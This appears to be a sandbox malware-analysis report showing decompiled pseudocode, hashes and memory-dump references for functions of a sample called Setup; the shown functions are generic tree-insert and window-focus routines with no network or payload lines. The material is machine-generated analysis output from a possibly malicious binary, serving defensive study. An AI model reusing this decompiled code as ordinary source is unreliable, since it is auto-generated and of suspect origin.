                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$InitVariant
                                                                                                                                                              • String ID: brwseCntnr$getBrowse
                                                                                                                                                              • API String ID: 2111759460-262030208
                                                                                                                                                              • Opcode ID: c52fb5ae1b5af3db22209827fb280a0f0815b1db6de82ece67e65c2be40546e1
                                                                                                                                                              • Instruction ID: 4fa7eccefb8ea2d50809eb1b252eb4b554dd85de9e3476904be64cfb06904a21
                                                                                                                                                              • Opcode Fuzzy Hash: c52fb5ae1b5af3db22209827fb280a0f0815b1db6de82ece67e65c2be40546e1
                                                                                                                                                              • Instruction Fuzzy Hash: 8031D570D001489BCB04EBA6D952BFEBBB4AF54304F50866EE511BB2D1DB785E04CBA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041F420 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0041F420(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v33;
				char _v40;
				char _v41;
				char _v48;
				char _v49;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _t66;
				void* _t72;
				void* _t95;
				void* _t96;
				intOrPtr* _t98;
				intOrPtr* _t101;
				void* _t142;
				void* _t143;
				void* _t147;

				_v56 = __ecx;
				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
				_v12 =  *((intOrPtr*)(_v56 + 4));
				_v5 = 1;
				while(1) {
					_t66 = E00420160(_v16);
					_t143 = _t142 + 4;
					_t149 =  *_t66;
					if( *_t66 != 0) {
						break;
					}
					_v12 = _v16;
					_t95 = E00436060(_t149, _v16);
					_t96 = E00415110(_a8);
					_t147 = _t143 + 8;
					_v5 = E00420AA0(_v56, _t96, _t95);
					if((_v5 & 0x000000ff) == 0) {
						_t98 = E00441910(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t98;
					} else {
						_t101 = E00415110(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t101;
					}
					_v16 = _v60;
				}
				__eflags = 0;
				if(0 == 0) {
					E00445360( &_v20, _v12);
					__eflags = _v5 & 0x000000ff;
					if(__eflags != 0) {
						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
						if(__eflags == 0) {
							E00420AC0( &_v20);
							L13:
							_t72 = E00415110(_a8);
							__eflags = E00420AA0(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
							if(__eflags == 0) {
								_v49 = 0;
								E00445E50(_a4,  &_v20,  &_v49);
								return _a4;
							}
							_v41 = 1;
							E00445E50(_a4, E00420290(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
							return _a4;
						}
						_v33 = 1;
						E00445E50(_a4, E00420290(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
						return _a4;
					}
					goto L13;
				}
				_v21 = 1;
				E00445E50(_a4, E00420290(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
				return _a4;
			}


























                                                                                                                                                              0x0041f426
                                                                                                                                                              0x0041f433
                                                                                                                                                              0x0041f43c
                                                                                                                                                              0x0041f43f
                                                                                                                                                              0x0041f443
                                                                                                                                                              0x0041f447
                                                                                                                                                              0x0041f44c
                                                                                                                                                              0x0041f452
                                                                                                                                                              0x0041f454
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041f459
                                                                                                                                                              0x0041f460
                                                                                                                                                              0x0041f46d
                                                                                                                                                              0x0041f472
                                                                                                                                                              0x0041f47e
                                                                                                                                                              0x0041f487
                                                                                                                                                              0x0041f4a0
                                                                                                                                                              0x0041f4a5
                                                                                                                                                              0x0041f4aa
                                                                                                                                                              0x0041f489
                                                                                                                                                              0x0041f48d
                                                                                                                                                              0x0041f492
                                                                                                                                                              0x0041f497
                                                                                                                                                              0x0041f497
                                                                                                                                                              0x0041f4b0
                                                                                                                                                              0x0041f4b0
                                                                                                                                                              0x0041f4b5
                                                                                                                                                              0x0041f4b7
                                                                                                                                                              0x0041f4f7
                                                                                                                                                              0x0041f500
                                                                                                                                                              0x0041f502
                                                                                                                                                              0x0041f51e
                                                                                                                                                              0x0041f520
                                                                                                                                                              0x0041f556
                                                                                                                                                              0x0041f55b
                                                                                                                                                              0x0041f55f
                                                                                                                                                              0x0041f585
                                                                                                                                                              0x0041f587
                                                                                                                                                              0x0041f5ba
                                                                                                                                                              0x0041f5c9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041f5ce
                                                                                                                                                              0x0041f589
                                                                                                                                                              0x0041f5ae
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041f5b3
                                                                                                                                                              0x0041f522
                                                                                                                                                              0x0041f544
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041f549
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041f504
                                                                                                                                                              0x0041f4b9
                                                                                                                                                              0x0041f4de
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 674a9958b9a5c9a5cb453f160200f63fe660729ab341863490913925c6397475
                                                                                                                                                              • Instruction ID: 2c4a320b3958d148fafe5ac47a3fe145740335362e9ed150bb876a8542427f4e
                                                                                                                                                              • Opcode Fuzzy Hash: 674a9958b9a5c9a5cb453f160200f63fe660729ab341863490913925c6397475
                                                                                                                                                              • Instruction Fuzzy Hash: 8A5194B5D04108BFCB04DF95D891EEF77BAAF98304F14806EF40AA7242DA34AA45CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00431600 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00431600(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v33;
				char _v40;
				char _v41;
				char _v48;
				char _v49;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _t66;
				void* _t72;
				void* _t95;
				void* _t96;
				intOrPtr* _t98;
				intOrPtr* _t101;
				void* _t142;
				void* _t143;
				void* _t147;

				_v56 = __ecx;
				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
				_v12 =  *((intOrPtr*)(_v56 + 4));
				_v5 = 1;
				while(1) {
					_t66 = E00408710(_v16);
					_t143 = _t142 + 4;
					_t149 =  *_t66;
					if( *_t66 != 0) {
						break;
					}
					_v12 = _v16;
					_t95 = E00436060(_t149, _v16);
					_t96 = E00415110(_a8);
					_t147 = _t143 + 8;
					_v5 = E0041CC50(_v56, _t96, _t95);
					if((_v5 & 0x000000ff) == 0) {
						_t98 = E00441910(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t98;
					} else {
						_t101 = E00415110(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t101;
					}
					_v16 = _v60;
				}
				__eflags = 0;
				if(0 == 0) {
					E00445360( &_v20, _v12);
					__eflags = _v5 & 0x000000ff;
					if(__eflags != 0) {
						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
						if(__eflags == 0) {
							E00431E70( &_v20);
							L13:
							_t72 = E00415110(_a8);
							__eflags = E0041CC50(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
							if(__eflags == 0) {
								_v49 = 0;
								E00445E50(_a4,  &_v20,  &_v49);
								return _a4;
							}
							_v41 = 1;
							E00445E50(_a4, E00431A00(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
							return _a4;
						}
						_v33 = 1;
						E00445E50(_a4, E00431A00(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
						return _a4;
					}
					goto L13;
				}
				_v21 = 1;
				E00445E50(_a4, E00431A00(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
				return _a4;
			}


























                                                                                                                                                              0x00431606
                                                                                                                                                              0x00431613
                                                                                                                                                              0x0043161c
                                                                                                                                                              0x0043161f
                                                                                                                                                              0x00431623
                                                                                                                                                              0x00431627
                                                                                                                                                              0x0043162c
                                                                                                                                                              0x00431632
                                                                                                                                                              0x00431634
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00431639
                                                                                                                                                              0x00431640
                                                                                                                                                              0x0043164d
                                                                                                                                                              0x00431652
                                                                                                                                                              0x0043165e
                                                                                                                                                              0x00431667
                                                                                                                                                              0x00431680
                                                                                                                                                              0x00431685
                                                                                                                                                              0x0043168a
                                                                                                                                                              0x00431669
                                                                                                                                                              0x0043166d
                                                                                                                                                              0x00431672
                                                                                                                                                              0x00431677
                                                                                                                                                              0x00431677
                                                                                                                                                              0x00431690
                                                                                                                                                              0x00431690
                                                                                                                                                              0x00431695
                                                                                                                                                              0x00431697
                                                                                                                                                              0x004316d7
                                                                                                                                                              0x004316e0
                                                                                                                                                              0x004316e2
                                                                                                                                                              0x004316fe
                                                                                                                                                              0x00431700
                                                                                                                                                              0x00431736
                                                                                                                                                              0x0043173b
                                                                                                                                                              0x0043173f
                                                                                                                                                              0x00431765
                                                                                                                                                              0x00431767
                                                                                                                                                              0x0043179a
                                                                                                                                                              0x004317a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004317ae
                                                                                                                                                              0x00431769
                                                                                                                                                              0x0043178e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00431793
                                                                                                                                                              0x00431702
                                                                                                                                                              0x00431724
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00431729
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004316e4
                                                                                                                                                              0x00431699
                                                                                                                                                              0x004316be
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 63f6e11ae261600f7b0eadfe7e58b16e9400b1e535cce3b340d6ef79147bb440
                                                                                                                                                              • Instruction ID: 996a7f4a3a204697f120b1106b66c89e51c997d561b5141b1d18d575e8886a06
                                                                                                                                                              • Opcode Fuzzy Hash: 63f6e11ae261600f7b0eadfe7e58b16e9400b1e535cce3b340d6ef79147bb440
                                                                                                                                                              • Instruction Fuzzy Hash: 71516EB5D04108BFCB04DBD5D891EEFBBB9AF88304F14805EF406A7251DB38AA05CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041C810 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0041C810(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v33;
				char _v40;
				char _v41;
				char _v48;
				char _v49;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _t66;
				void* _t72;
				void* _t95;
				void* _t96;
				intOrPtr* _t98;
				intOrPtr* _t101;
				void* _t142;
				void* _t143;
				void* _t147;

				_v56 = __ecx;
				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
				_v12 =  *((intOrPtr*)(_v56 + 4));
				_v5 = 1;
				while(1) {
					_t66 = E0041CEF0(_v16);
					_t143 = _t142 + 4;
					_t149 =  *_t66;
					if( *_t66 != 0) {
						break;
					}
					_v12 = _v16;
					_t95 = E00436060(_t149, _v16);
					_t96 = E00415110(_a8);
					_t147 = _t143 + 8;
					_v5 = E0041CC50(_v56, _t96, _t95);
					if((_v5 & 0x000000ff) == 0) {
						_t98 = E00441910(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t98;
					} else {
						_t101 = E00415110(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t101;
					}
					_v16 = _v60;
				}
				__eflags = 0;
				if(0 == 0) {
					E00445360( &_v20, _v12);
					__eflags = _v5 & 0x000000ff;
					if(__eflags != 0) {
						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
						if(__eflags == 0) {
							E0041D4F0( &_v20);
							L13:
							_t72 = E00415110(_a8);
							__eflags = E0041CC50(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
							if(__eflags == 0) {
								_v49 = 0;
								E00445E50(_a4,  &_v20,  &_v49);
								return _a4;
							}
							_v41 = 1;
							E00445E50(_a4, E0041CFA0(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
							return _a4;
						}
						_v33 = 1;
						E00445E50(_a4, E0041CFA0(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
						return _a4;
					}
					goto L13;
				}
				_v21 = 1;
				E00445E50(_a4, E0041CFA0(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
				return _a4;
			}


























                                                                                                                                                              0x0041c816
                                                                                                                                                              0x0041c823
                                                                                                                                                              0x0041c82c
                                                                                                                                                              0x0041c82f
                                                                                                                                                              0x0041c833
                                                                                                                                                              0x0041c837
                                                                                                                                                              0x0041c83c
                                                                                                                                                              0x0041c842
                                                                                                                                                              0x0041c844
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c849
                                                                                                                                                              0x0041c850
                                                                                                                                                              0x0041c85d
                                                                                                                                                              0x0041c862
                                                                                                                                                              0x0041c86e
                                                                                                                                                              0x0041c877
                                                                                                                                                              0x0041c890
                                                                                                                                                              0x0041c895
                                                                                                                                                              0x0041c89a
                                                                                                                                                              0x0041c879
                                                                                                                                                              0x0041c87d
                                                                                                                                                              0x0041c882
                                                                                                                                                              0x0041c887
                                                                                                                                                              0x0041c887
                                                                                                                                                              0x0041c8a0
                                                                                                                                                              0x0041c8a0
                                                                                                                                                              0x0041c8a5
                                                                                                                                                              0x0041c8a7
                                                                                                                                                              0x0041c8e7
                                                                                                                                                              0x0041c8f0
                                                                                                                                                              0x0041c8f2
                                                                                                                                                              0x0041c90e
                                                                                                                                                              0x0041c910
                                                                                                                                                              0x0041c946
                                                                                                                                                              0x0041c94b
                                                                                                                                                              0x0041c94f
                                                                                                                                                              0x0041c975
                                                                                                                                                              0x0041c977
                                                                                                                                                              0x0041c9aa
                                                                                                                                                              0x0041c9b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c9be
                                                                                                                                                              0x0041c979
                                                                                                                                                              0x0041c99e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c9a3
                                                                                                                                                              0x0041c912
                                                                                                                                                              0x0041c934
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c939
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0041c8f4
                                                                                                                                                              0x0041c8a9
                                                                                                                                                              0x0041c8ce
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 053cb36615b50c11b9affa81ef5e7e281e4dcdacd00ba29a504b599901895e19
                                                                                                                                                              • Instruction ID: 2d2d5e5912a5e220dfae65aaf11e39b30c8cc877763405f5282d199abf3413ee
                                                                                                                                                              • Opcode Fuzzy Hash: 053cb36615b50c11b9affa81ef5e7e281e4dcdacd00ba29a504b599901895e19
                                                                                                                                                              • Instruction Fuzzy Hash: D75133B5D04108BFDB04DFD5DC91AEFBBB9AF88304F14805EF409A7241DA35AA45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0042AE40 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0042AE40(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v33;
				char _v40;
				char _v41;
				char _v48;
				char _v49;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _t66;
				void* _t72;
				void* _t95;
				void* _t96;
				intOrPtr* _t98;
				intOrPtr* _t101;
				void* _t142;
				void* _t143;
				void* _t147;

				_v56 = __ecx;
				_v16 =  *((intOrPtr*)(E0041D410(_v56)));
				_v12 =  *((intOrPtr*)(_v56 + 4));
				_v5 = 1;
				while(1) {
					_t66 = E0043F400(_v16);
					_t143 = _t142 + 4;
					_t149 =  *_t66;
					if( *_t66 != 0) {
						break;
					}
					_v12 = _v16;
					_t95 = E00436060(_t149, _v16);
					_t96 = E00415110(_a8);
					_t147 = _t143 + 8;
					_v5 = E00420AA0(_v56, _t96, _t95);
					if((_v5 & 0x000000ff) == 0) {
						_t98 = E00441910(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t98;
					} else {
						_t101 = E00415110(_v16);
						_t142 = _t147 + 4;
						_v60 =  *_t101;
					}
					_v16 = _v60;
				}
				__eflags = 0;
				if(0 == 0) {
					E00445360( &_v20, _v12);
					__eflags = _v5 & 0x000000ff;
					if(__eflags != 0) {
						__eflags = E00444870( &_v20, E004083B0(_v56,  &_v32)) & 0x000000ff;
						if(__eflags == 0) {
							E0043B320( &_v20);
							L13:
							_t72 = E00415110(_a8);
							__eflags = E00420AA0(_v56, E00436060(__eflags, E0041D530( &_v20)), _t72) & 0x000000ff;
							if(__eflags == 0) {
								_v49 = 0;
								E00445E50(_a4,  &_v20,  &_v49);
								return _a4;
							}
							_v41 = 1;
							E00445E50(_a4, E0042B200(_v56, __eflags,  &_v48, _v5 & 0x000000ff, _v12, _a8),  &_v41);
							return _a4;
						}
						_v33 = 1;
						E00445E50(_a4, E0042B200(_v56, __eflags,  &_v40, 1, _v12, _a8),  &_v33);
						return _a4;
					}
					goto L13;
				}
				_v21 = 1;
				E00445E50(_a4, E0042B200(_v56, 0,  &_v28, _v5 & 0x000000ff, _v12, _a8),  &_v21);
				return _a4;
			}


























                                                                                                                                                              0x0042ae46
                                                                                                                                                              0x0042ae53
                                                                                                                                                              0x0042ae5c
                                                                                                                                                              0x0042ae5f
                                                                                                                                                              0x0042ae63
                                                                                                                                                              0x0042ae67
                                                                                                                                                              0x0042ae6c
                                                                                                                                                              0x0042ae72
                                                                                                                                                              0x0042ae74
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042ae79
                                                                                                                                                              0x0042ae80
                                                                                                                                                              0x0042ae8d
                                                                                                                                                              0x0042ae92
                                                                                                                                                              0x0042ae9e
                                                                                                                                                              0x0042aea7
                                                                                                                                                              0x0042aec0
                                                                                                                                                              0x0042aec5
                                                                                                                                                              0x0042aeca
                                                                                                                                                              0x0042aea9
                                                                                                                                                              0x0042aead
                                                                                                                                                              0x0042aeb2
                                                                                                                                                              0x0042aeb7
                                                                                                                                                              0x0042aeb7
                                                                                                                                                              0x0042aed0
                                                                                                                                                              0x0042aed0
                                                                                                                                                              0x0042aed5
                                                                                                                                                              0x0042aed7
                                                                                                                                                              0x0042af17
                                                                                                                                                              0x0042af20
                                                                                                                                                              0x0042af22
                                                                                                                                                              0x0042af3e
                                                                                                                                                              0x0042af40
                                                                                                                                                              0x0042af76
                                                                                                                                                              0x0042af7b
                                                                                                                                                              0x0042af7f
                                                                                                                                                              0x0042afa5
                                                                                                                                                              0x0042afa7
                                                                                                                                                              0x0042afda
                                                                                                                                                              0x0042afe9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042afee
                                                                                                                                                              0x0042afa9
                                                                                                                                                              0x0042afce
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042afd3
                                                                                                                                                              0x0042af42
                                                                                                                                                              0x0042af64
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042af69
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042af24
                                                                                                                                                              0x0042aed9
                                                                                                                                                              0x0042aefe
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cnd_initHandlestd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3964502784-0
                                                                                                                                                              • Opcode ID: 52a222c8b7323ebc3dd8ca1e3ca17d3fefcf9e748fa0fa7ff610bb1d419f37ed
                                                                                                                                                              • Instruction ID: fac1375bb57e625ba080fb7128a1a8b3c9b784a227bf72c1a346f58f0427bc84
                                                                                                                                                              • Opcode Fuzzy Hash: 52a222c8b7323ebc3dd8ca1e3ca17d3fefcf9e748fa0fa7ff610bb1d419f37ed
                                                                                                                                                              • Instruction Fuzzy Hash: 6D5193B5E04118BFCB04DB95D891EEFB7B9AF98304F50805EF406A7241DB38AA05CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040BE70 Relevance: 6.1, APIs: 4, Instructions: 118windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E0040BE70(intOrPtr* __ecx, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr* _v32;
				signed int _t43;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t58;
				signed int _t115;

				_push(0xffffffff);
				_push(0x513ff8);
				_push( *[fs:0x0]);
				_t43 =  *0x561244; // 0xddd124f9
				_push(_t43 ^ _t115);
				 *[fs:0x0] =  &_v16;
				_v24 = __ecx;
				 *(_v24 + 0x98) =  *(_v24 + 0x98) | 0x00000020;
				_t47 = _v24;
				_t118 =  *(_t47 + 0x98) >> 0x00000006 & 0x00000001;
				if(( *(_t47 + 0x98) >> 0x00000006 & 0x00000001) != 0) {
					L10:
					 *_a16 = 0;
					 *[fs:0x0] = _v16;
					return 0;
				}
				if((E00430370(_v24 + 0x64, _t118, 0) & 0x000000ff) == 0) {
					L6:
					if(( *(_v24 + 0x98) >> 0x00000003 & 0x00000001) == 0) {
						_t53 = E0040BE50(_v24 + 4, GetFocus());
						__eflags = _t53;
						if(_t53 == 0) {
							SetFocus(GetWindow( *(_v24 + 4), 5));
						}
					} else {
						SetFocus( *(_v24 + 4));
					}
					goto L10;
				}
				_t58 = _v24;
				_t120 =  *(_t58 + 0x98) >> 0x00000001 & 0x00000001;
				if(( *(_t58 + 0x98) >> 0x00000001 & 0x00000001) != 0) {
					goto L6;
				}
				E00414C90();
				_v8 = 0;
				_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x10))))();
				 *((intOrPtr*)( *((intOrPtr*)( *_v28))))(_v28, 0x51da8c, E00434050( &_v20));
				if((E00430370( &_v20, _t120, 0) & 0x000000ff) != 0) {
					_v32 = E0041D530(_v24 + 0x64);
					 *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x2c))))(_v32, 0xfffffffc, 0, E0041D530( &_v20), 0,  *(_v24 + 4), _v24 + 0xb4);
				}
				_v8 = 0xffffffff;
				E0040D320();
				goto L6;
			}














                                                                                                                                                              0x0040be73
                                                                                                                                                              0x0040be75
                                                                                                                                                              0x0040be80
                                                                                                                                                              0x0040be84
                                                                                                                                                              0x0040be8b
                                                                                                                                                              0x0040be8f
                                                                                                                                                              0x0040be95
                                                                                                                                                              0x0040bea7
                                                                                                                                                              0x0040bead
                                                                                                                                                              0x0040beb9
                                                                                                                                                              0x0040bebc
                                                                                                                                                              0x0040bfd0
                                                                                                                                                              0x0040bfd3
                                                                                                                                                              0x0040bfde
                                                                                                                                                              0x0040bfe9
                                                                                                                                                              0x0040bfe9
                                                                                                                                                              0x0040bed4
                                                                                                                                                              0x0040bf84
